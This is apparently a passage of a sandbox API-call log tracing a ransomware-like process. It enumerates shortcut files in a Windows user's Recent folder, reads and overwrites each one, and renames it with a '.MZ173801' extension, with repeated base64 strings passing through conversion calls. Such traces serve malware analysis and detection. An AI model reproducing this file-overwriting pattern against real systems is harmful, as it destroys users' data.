lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.694] GetCurrentThreadId () returned 0x1358 [0106.694] GetCurrentThreadId () returned 0x1358 [0106.694] GetCurrentThreadId () returned 0x1358 [0106.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.695] GetCurrentThreadId () returned 0x1358 [0106.695] GetCurrentThreadId () returned 0x1358 [0106.695] GetCurrentThreadId () returned 0x1358 [0106.695] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5iO4NXS5B547.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5io4nxs5b547.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x52b [0106.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.695] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x52b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x52b, lpOverlapped=0x0) returned 1 [0106.696] CloseHandle (hObject=0x3f4) returned 1 [0106.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5iO4NXS5B547.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5io4nxs5b547.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.697] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x52b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x52b, lpOverlapped=0x0) returned 1 [0106.698] CloseHandle (hObject=0x3f4) returned 1 [0106.699] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5iO4NXS5B547.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5io4nxs5b547.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5iO4NXS5B547.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5io4nxs5b547.lnk.mz173801")) returned 1 [0106.699] GetCurrentThreadId () returned 0x1358 [0106.699] GetCurrentThreadId () returned 0x1358 [0106.699] GetCurrentThreadId () returned 0x1358 [0106.699] GetCurrentThreadId () returned 0x1358 [0106.699] GetCurrentThreadId () returned 0x1358 [0106.699] GetCurrentThreadId () returned 0x1358 [0106.699] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea0b4498, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xead5ee94, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xead5ee94, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x33b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5xR3.lnk", cAlternateFileName="")) returned 1 [0106.699] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.699] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5xR3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5xr3.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea0b4498, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xead5ee94, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xead5ee94, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x33b)) returned 1 [0106.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.700] GetCurrentThreadId () returned 0x1358 [0106.700] GetCurrentThreadId () returned 0x1358 [0106.700] GetCurrentThreadId () returned 0x1358 [0106.701] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.701] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.701] GetCurrentThreadId () returned 0x1358 [0106.701] GetCurrentThreadId () returned 0x1358 [0106.701] GetCurrentThreadId () returned 0x1358 [0106.701] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5xR3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5xr3.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.701] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.701] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.701] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x33b [0106.701] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.701] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x33b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x33b, lpOverlapped=0x0) returned 1 [0106.702] CloseHandle (hObject=0x3f4) returned 1 [0106.702] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5xR3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5xr3.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.703] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x33b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x33b, lpOverlapped=0x0) returned 1 [0106.704] CloseHandle (hObject=0x3f4) returned 1 [0106.705] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5xR3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5xr3.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5xR3.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5xr3.lnk.mz173801")) returned 1 [0106.705] GetCurrentThreadId () returned 0x1358 [0106.705] GetCurrentThreadId () returned 0x1358 [0106.705] GetCurrentThreadId () returned 0x1358 [0106.705] GetCurrentThreadId () returned 0x1358 [0106.705] GetCurrentThreadId () returned 0x1358 [0106.705] GetCurrentThreadId () returned 0x1358 [0106.706] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76288cc6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76288cc6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7628a073, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6E4Yux.lnk", cAlternateFileName="")) returned 1 [0106.706] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.706] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.706] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6E4Yux.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6e4yux.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76288cc6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76288cc6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7628a073, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x59c)) returned 1 [0106.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 